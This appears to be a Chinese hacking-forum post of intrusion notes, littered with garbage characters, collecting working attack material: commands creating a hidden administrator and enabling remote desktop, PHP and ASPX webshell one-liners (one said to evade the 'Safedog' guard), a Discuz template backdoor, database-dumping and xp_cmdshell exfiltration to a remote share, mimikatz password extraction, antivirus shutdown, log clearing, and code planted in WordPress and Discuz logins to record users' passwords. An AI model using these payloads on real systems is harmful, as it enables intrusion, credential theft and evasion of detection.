# ]2 x  f7 P' X
/h:<height> -- 指定远程桌面屏幕的高度。

, g5 Q0 K- S' I7 ^9 z& J4 t/edit -- 打开指定的 .rdp 文件来编辑。

% m; m5 S$ ~6 x4 |; @: H* t9 E$ ~/migrate -- 将客户端连接管理器创建的旧版
0 ?2 d4 J* X* S% Z8 ^连接文件迁移到新的 .rdp 连接文件。
/ t/ l5 `1 m6 i% p/ z
6 K2 {) N% R/ F# W# G3 }+ U
其中mstsc /console连接的是session 0，而mstsc是另外打开一个虚拟的session，这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊，有的时候用得着的，特别是一些软件就
  r9 Q- e; J" Y8 P0 `mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
" }9 Z8 n1 T: X7 O
命令行下开启3389
net user asp.net aspnet /add
& C7 K. h8 c8 Y! qnet localgroup Administrators asp.net /add
' z* W2 z# n$ T9 H/ }net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
7 E& W/ U, O! k1 Q; y+ Q8 necho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
  c* a/ @6 K7 o& W1 Iecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
; }& O: k. I9 G4 B' P<input type="file" name="NewFile" size="50"><br>
" V+ H* f4 n  _) `$ q  f' J<input id="btnUpload" type="submit" value="Upload">
</form>
/ B  C4 y7 M$ A+ k  \' Q
: s5 z+ y% C/ F1 \1 w* `% scontrol userpasswords2 查看用户的密码
# Z; U( \/ x- J) n6 naccess数据库直接导出为shell，前提a表在access中存在。知道网站的真实路径
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

0 L' D9 l6 D: T# U141、平时手工MSSQL注入的时候如果不能反弹写入，那么大多数都是把记录一条一条读出来，这样太累了，这里给出1条语句能读出所有数据:
测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

7 p3 b9 \% Y4 S测试2：

  O; _5 b6 H, q# z- D! d! Wcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
: [+ E/ o4 q/ V9 f3 J1 K8 y+ c' W+ B
6 H% Y& _7 t( I* {! C' Xdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
关闭macfee软件的方法：//需要system权限，请使用at或psexec –s cmd.exe命令
0 C& }; y, h( g' a8 L# B$ G! H* F可以上传.com类型的文件，如nc.com来绕过macfee可执行限制；
. R, g: I1 `6 }2 x& x' K/ i, Wnet stop mcafeeframework
net stop mcshield
1 x0 `2 p4 ~4 Y. E  p" L' Onet stop mcafeeengineservice
net stop mctaskmanager
7 b" O4 U& X, u2 K% thttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
$ v& d+ B# |& k8 s' ^6 o. K
$ \- ^* ^8 u6 ~7 B1 e  VNCDump.zip (4.76 KB, 下载次数: 1)
- o" ^/ f% m  z$ j( [/ C" O密码在线破解http://tools88.com/safe/vnc.php
; Z+ \- W) v/ c5 E! ?' UVNC密码可以通过vncdump 直接获取，通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
4 S$ J5 g# T7 J3 N7 t4 b2 @7 m; D
, b5 x5 n$ t) uexec master..xp_cmdshell 'net user'
mssql执行命令。
获取mssql的密码hash查询
# s8 x0 _9 H! O/ X! Qselect name,password from master.dbo.sysxlogins

: ?3 `$ E2 E( @. J# N, Tbackup log dbName with NO_LOG;
0 s( `, N9 ?0 [: u7 z% e$ Z" X6 J% mbackup log dbName with TRUNCATE_ONLY;
& s; Y; B: z, O  rDBCC SHRINKDATABASE(dbName);
, _% [* T% P( C( y/ G- h& Omssql数据库压缩

, ~# j" G6 @+ h! D: C" W" ERar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
0 w! R5 S/ `- g4 k将game_db_201107170400.BAK文件压缩为1.rar，大小为200M的分卷文件。
* i/ m8 A+ x6 O9 J" q
% Y7 m+ ~! o' p' D8 G, Jbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
备份game数据库为game.bak，路径为D:\WebSites\game.com\UpFileList\game.bak

: Z7 F0 e! v/ G$ |( U& jDiscuz！nt35渗透要点：
+ Q3 V6 l7 g8 A, Q! E8 R（1）访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
- g, W! W6 ]2 @4 t. Q（2）打开rss.aspx文件，将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份，然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
1 P( ~0 e6 p' J0 v（3）保存。
( \5 K; z6 {4 [3 A; j3 Z# D（4）一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
+ E) G  j- I. {3 y8 _d:\rar.exe a -r d:\1.rar d:\website\
' V$ B) u& t; o  {( |  L递归压缩website
注意rar.exe的路径
  t  s1 K" T) w. ]; F+ _) w) J* G
<?php
. [3 v0 f! j6 [4 f; q( C# z
$telok   = "0${@eval($_POST[xxoo])}";
# f6 x: q6 [' g2 k
& t+ Y* Q. u( z2 C$username   = "123456";
3 E/ Q8 a' X$ @/ |$ h# y9 f
  r7 O6 x, {" O# V' K# y$userpwd   = "123456";
; Z+ S( K) @' A2 H9 H2 t% h/ v& ^
$telhao   = "123456";

  Z+ M. ]3 ?8 d$telinfo   = "123456";
+ U( h0 f1 ^1 j4 F# _) \% _$ i
* i: w) ^6 v$ `; |7 m. c$ Y9 b) C?>
php一句话未过滤插入一句话木马
% u) w; q4 y; I! \: X  l
4 I5 H- V, v# H站库分离脱裤技巧
& c% V) _. F  u' Z% E1 {exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。
这儿利用的是马儿的专家模式（自己写代码）。
! j' v9 V4 {8 x& M3 ^ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
. ?) [1 z, U8 N( e) O& a# |( `* m$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
% S/ G( n4 ?  _( i) I$i = 0;
$tmp = '';
) E6 o# A9 I) P4 g* vwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
) {% E) U  [. ^+ E' {7 W    $i = $i+1;
    $tmp .=  implode("::", $row)."\n";
3 }5 P7 B1 [3 E    if(!($i%500)){//500条写入一个文件
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
1 K. L9 u2 p! g  d7 Q2 P        $tmp = '';
3 G4 F# I$ c- r  M- }" b    }
% r) e0 y( e/ [& i}
; }: D6 s# V5 T& W+ I9 V  c. Emysql_free_result($result);
/ I( z! b- `- M

& }" Y# N; @' [9 D
% A( N, |  I- v) \3 o7 _, J2 @; b//down完后delete
2 D, \/ |1 c; A; [4 q
+ {- @5 ~# ?. }  ]: |
ini_set('display_errors', 1);
. X% U9 j6 W! L8 V/ werror_reporting(E_ALL);
. x+ E: |) N1 ]. t# w$i = 0;
' C! I5 t& H8 n* j  O& g: Xwhile($i<32) {
    $i = $i+1;
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
) ?" r6 w( B( v4 l) o        unlink($filename);
}
httprint 收集操作系统指纹
扫描192.168.1.100的所有端口
9 W# S  p# I9 m5 v% `1 @nmap –PN –sT –sV –p0-65535 192.168.1.100
) M, O0 l- T, r- ?$ ]) Nhost -t ns www.owasp.org 识别的名称服务器，获取dns信息
& T9 u& R4 g9 z; lhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
Netcraft的DNS搜索服务，地址http://searchdns.netcraft.com/?host
0 W2 J! m( p4 n- A) i8 \6 {
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)

! E2 C+ }; c$ z- ]2 \. A6 w　　MSN search: http://search.msn.com 语法： "ip:x.x.x.x" (没有引号)

3 K& B( [$ ^  x& i　　Webhosting info: http://whois.webhosting.info/ 语法： http://whois.webhosting.info/x.x.x.x
  n, U- W) c  d8 e$ V1 |- P
* D& _- l- H6 i' T, s　　DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)

　　http://net-square.com/msnpawn/index.shtml (要求安装)

4 I" E: C  k% D' o0 P　　tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
/ @  @/ b) [  }2 a
　　SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
set names gb2312
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。

mysql 密码修改
  x+ ?" r" y: F8 p$ y5 t0 gUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
- x4 \- m$ ]: T8 A高级的PHP一句话木马后门

入侵过程发现很多高级的PHP一句话木马。记录下来，以后可以根据关键字查杀
; y4 ?: t; ^8 t' u' l( d5 A) o+ |
1、
; x8 c/ p9 ]/ P0 N: y% {9 C, B
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
" L3 }- g; l. l" b$ j
3 N  z* X, ~& l; h6 a( x/ V9 N$hh("/[discuz]/e",$_POST['h'],"Access");

* v' [1 F3 F1 i+ z% o$ r  H1 p3 ?//菜刀一句话

9 O, M/ y$ e" o2、
& C% C- D+ L7 k' s; ^1 U
" C' \' K3 N9 K  Q8 w$filename=$_GET['xbid'];
. P- v* }/ k& o/ B# ^8 J
, e% ^, ~' V. C  Winclude ($filename);
7 S$ @) N$ h" }  {; b) D7 q
//危险的include函数，直接编译任何文件为php格式运行

3、

$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

7 ~9 s0 r" j) E8 H- g//重命名任何文件

4、

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
6 l% Y# @: O- R( E' s* S
$gzid("/[discuz]/e",$_POST['h'],"Access");
; G1 O! }: @1 Q7 G/ o( Z1 P
//菜刀一句话

5、include ($uid);

/ R2 ^- k( R2 {# N9 r//危险的include函数，直接编译任何文件为php格式运行，POST

! g8 t9 O+ C' @4 y  K1 {4 c
//gif插一句话

1 I/ u! H( H' w$ E( i6、典型一句话

程序后门代码
<?php eval_r($_POST[sb])?>
程序代码
<?php @eval_r($_POST[sb])?>
# q  ^% M* \5 ~$ g5 Q* E//容错代码
程序代码
% t7 ]; z; O, {. w. |: K<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
: h" ?: U* S, y6 U$ w$ I" d9 q' ]程序代码
% G  t! q5 O" F9 p. r<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
9 V( _3 r' }) O- s* }( E% A@preg_replace("/[email]/e",$_POST['h'],"error");
?>
5 q9 _: m3 I, g/ L. |: D//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
9 O6 r' a5 U, j4 Y5 s) n程序代码
/ Z4 v% [7 ?6 F2 W1 n% Z2 Q<O>h=@eval_r($_POST[c]);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
详细用法：
7 [. U, J0 q$ T. g6 q" w% k1、到tools目录。psexec \\127.0.0.1 cmd
8 J/ X8 ?- U/ T+ g( v/ e2、执行mimikatz
7 }) R1 a, A- Y3 C7 F1 B3、执行 privilege::debug
4、执行 inject::process lsass.exe sekurlsa.dll
5、执行@getLogonPasswords
  h- v- a4 `, F8 G$ _; n6、widget就是密码
* I: |" l3 Z( O& K' o4 M' w7、exit退出，不要直接关闭否则系统会崩溃。
+ N4 T- L& P6 T4 _: F
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面

% M. U! V: f0 A. y自动查找系统高危补丁
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

突破安全狗的一句话aspx后门
; s4 V, X( K; ?<%@ Page Language="C#" ValidateRequest="false" %>
' m( @; D$ x1 u- i3 V) j+ W# _% i7 T( f<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
webshell下记录WordPress登陆密码
3 c: `8 X, |- K$ ?# P" Xwebshell下记录Wordpress登陆密码方便进一步社工
在文件wp-login.php中539行处添加：
// log password
$log_user=$_POST['log'];
2 ]5 E& B% P2 z5 E- x4 a  |$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
+ o$ \1 J/ h8 ?+ `( w- j$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
0 a: [, l* q$ K6 x1 S" J$txt=$txt.”\r\n”;
) [" |$ U8 a0 w# m# Lif($log_user&&$log_pwd&&$log_ip){
/ Q& }# t  @3 j2 O8 }@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
) ?  D0 |9 E9 S}
) h% P' U( e; E; F  v1 T当action=login的时候会触发记录密码code，当然了你也可以在switch…case..语句中的default中写该代码。
# F7 e: i+ s$ b& {! K) f就是搜索case ‘login’
在它下面直接插入即可，记录的密码生成在pwd.txt中，
其实修改wp-login.php不是个好办法。容易被发现，还有其他的方法的，做个记录
1 d" [" B; j0 [& c9 z8 E, e利用II6文件解析漏洞绕过安全狗代码：
;antian365.asp;antian365.jpg
3 D" u7 L$ p! H
1 s% ~2 [9 Y$ U各种类型数据库抓HASH破解最高权限密码！
1.sql server2000
8 o9 v  [; s; g6 y" a: dSELECT password from master.dbo.sysxlogins where name='sa'
7 @& o. k# w9 T: w2 j0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
  l7 G( F/ z2 h  |' U6 B
4 ?# P9 i: A: `+ n0×0100- constant header
" Q8 D( r! x  C$ ~34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
: D+ {8 s! E- J+ j) d- h) ]2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
; M/ h% y+ T) C3 s' o6 K2 _crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
3 j: [- T" A& V0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
* J/ g! J! e$ Y) w# f1 E/ a. z993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
3 N( @: Y9 d; R: ~& J" ^- g
% s1 d9 q6 J& U% m  bupdate:- following bernardo’s comments:-
use function fn_varbintohexstr() to cast password in a hex string.
  u( X& S: C. V- z9 pe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

4 w! d+ J; s0 rMYSQL:-
6 ~- [- j% z5 `' o' ?" k) k' l
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql  < 4.1

mysql> SELECT PASSWORD(‘mypass’);
+——————–+
| PASSWORD(‘mypass’) |
+——————–+
| 6f8c114b58f2ce9e   |
- }/ p5 J7 F3 ^5 ]" W# S+——————–+
1 s) Z7 X# p, n* Y3 \7 M) ^* `
*mysql >=4.1
$ e% e: N  ]4 f! X' j3 e$ K
mysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
1 `1 h$ T& e; j; w| PASSWORD(‘mypass’)                        |
+——————————————-+
, G3 g& |/ f+ h; y2 m, _7 o1 f| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+

6 _0 O5 C+ X4 JSelect user, password from mysql.user
The hashes can be cracked in ‘cain and abel’
8 i' I7 c3 t& C; n& c% V
$ S5 s5 Y4 b, v: H% s$ ePostgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
+ O- G! }& F! E) [- p8 `8 Mselect usename, passwd from pg_shadow;
usename      |  passwd
——————+————————————-
+ `6 Y; D) a1 T: btestuser            | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
, a( r+ w% s: ^# g9 V+ l9 Xselect name, password, spare4 from sys.user$
3 j$ u6 f( s2 ^! chashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
  n" \/ _& M. ?& W8 R* L4 W+ W! eMore on Oracle later, i am a bit bored….

: I* Y- B4 K* H% i2 F( Y# R" J) u
在sql server2005/2008中开启xp_cmdshell
* N* O' P, B5 Z-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
# \  W# j/ h& t7 ]: YGO
-- To update the currently configured value for advanced options.
+ t. W- e, R' H6 r4 c; S3 ?RECONFIGURE
9 u. B+ z0 G1 F1 {8 O; iGO
! F! }8 x; d- ^- E9 `-- To enable the feature.
: l3 U# W! R* W( E5 x# h8 @' Z3 eEXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
SQL 2008 server日志清除，在清楚前一定要备份。
, Y# v8 {# k3 y) k如果Windows Server 2008 标准版安装SQL Express 2008，则在这里删除：
Ｘ:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

对于SQL Server 2008以前的版本：
SQL Server 2005:
9 n( E5 M, D( l' d  J  U删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
- P9 \7 L3 U' u' R* Y: R- [. hSQL Server 2000:
. R2 u6 ~3 d3 a/ [3 F& {$ H! @清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
2 [# b6 N  R/ y: _! a: E7 V' L  z7 Q
本帖最后由 simeon 于 2013-1-3 09:51 编辑

8 ]2 j' j" q0 S( V  G5 k; z( P" n; x
1 l. G# O7 `$ Ywindows 2008 文件权限修改
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
3 y+ p: L1 T# v) }1 s2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
* Y+ F0 j- x5 x2 D一、先在右键菜单里面看看有没有“管理员取得所有权”，没有“管理员取得所有权”，
6 m$ V" a1 P% E, j" X% M; n
+ P9 q! n; T0 P0 ~Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
: t. z, a' q3 N* F  L"NoWorkingDirectory"=""
% b$ }& d2 ^5 W7 @[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
$ J9 _; K9 q9 E' O[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
2 i% J: r( {1 I) _( W"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 C& q  q( J. }. m: I0 h) C/ a9 b
2 A5 C7 }* i2 S2 q, f1 Z[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
6 O6 Z2 k' m2 W: i3 E: D"NoWorkingDirectory"=""
$ I. B9 {3 q1 X5 ~" p, u[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
$ ^9 l' L, q  T1 {+ H' L4 X8 K@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
$ G! W" |$ k. `6 S9 Y& m"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
8 m. v% c$ C7 g$ F% w. z
1 |" t+ Y7 B0 Q0 {$ f+ S( e0 Z3 i
win7右键“管理员取得所有权”.reg导入
' r$ M9 F5 T6 A* D7 B. ]. M二、在C:\Windows目录里下搜索“notepad.exe”文件，应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”，
1、C:\Windows这个路径的“notepad.exe”不需要替换
. B6 U6 R# p" d, l. U2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
8 f& ]6 v* @/ w# A5 V$ A: ^3、四个“notepad.exe.mui”不要管
+ G2 d6 y1 C+ [1 M& |0 v4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
4 P4 V2 o# ]# |) ^1 g+ U( v& oC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
替换方法先取得这两个文件夹的管理员权限，然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面，
9 s+ L/ e9 l$ e4 U2 E' p% d' P. o替换完之后回到桌面，新建一个txt文档打开看看是不是变了。
windows 2008中关闭安全策略：
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
: r" g2 A: P# U  s, e  E6 b修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
& b% {# Z2 M" ^3 x) @* [% U# _下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
" p* o; Y) y* q# M8 d- x你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw
if(getenv('HTTP_CLIENT_IP')) {
8 w7 v1 U. v5 ^" `0 B# W7 P# t$onlineip = getenv('HTTP_CLIENT_IP');
% Q$ {$ p- ^" A6 R} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
  w# F0 c3 w# W# i8 l$onlineip = getenv('HTTP_X_FORWARDED_FOR');
# ~5 Q* m, R% v2 z5 d" b# l, [8 Y1 s} elseif(getenv('REMOTE_ADDR')) {
$onlineip = getenv('REMOTE_ADDR');
} else {
/ t# F, V: m) K9 K$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
4 _8 P/ F; J4 x. ^9 h; E& }! [     $showtime=date("Y-m-d H:i:s");
    $record="<?exit();?>用户：".$username." 密码：".$password." IP:".$onlineip." Time:".$showtime."\r\n";
6 G0 q0 _1 S' h0 q& P9 n& ]    $handle=fopen('./data/cache/csslog.php','a+');
    $write=fwrite($handle,$record);